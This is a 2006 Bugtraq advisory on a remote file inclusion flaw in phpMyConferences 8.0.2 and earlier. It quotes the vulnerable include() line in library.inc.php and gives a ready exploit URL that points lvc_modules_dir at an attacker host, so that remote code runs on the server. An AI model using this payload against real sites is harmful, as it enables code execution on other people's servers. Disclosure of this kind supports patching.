[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
phpMyConferences <= 8.0.2 Remote File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: phpMyConferences <= 8.0.2 Remote File Inclusion
- From: mfp.c@xxxxxxxxxxx
- Date: 31 Oct 2006 15:56:01 -0000
# phpMyConferences <= 8.0.2 Remote File Inclusion
#
# Found by mfp.c => mfp.c@xxxxxxxxxxx [brazil rlz]
#
# Greetz: F-117, Silver lords e pra tu pri :*
################################################
#
#
# Arquivo: library.inc.php
#
# Bug:
# if (!$gloaded_modules[$image_name])
# {
#
include($lvc_modules_dir.'/'.$module_name.'.module.php');
# $gloaded_modules[$module_name] = true;
# }
#
#
# Exploit:
#
#
http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/library.inc.php?lvc_modules_dir=http://attack/
#
#
# THANKS: Milw0rm,str0ke, google....
#
#
###############################################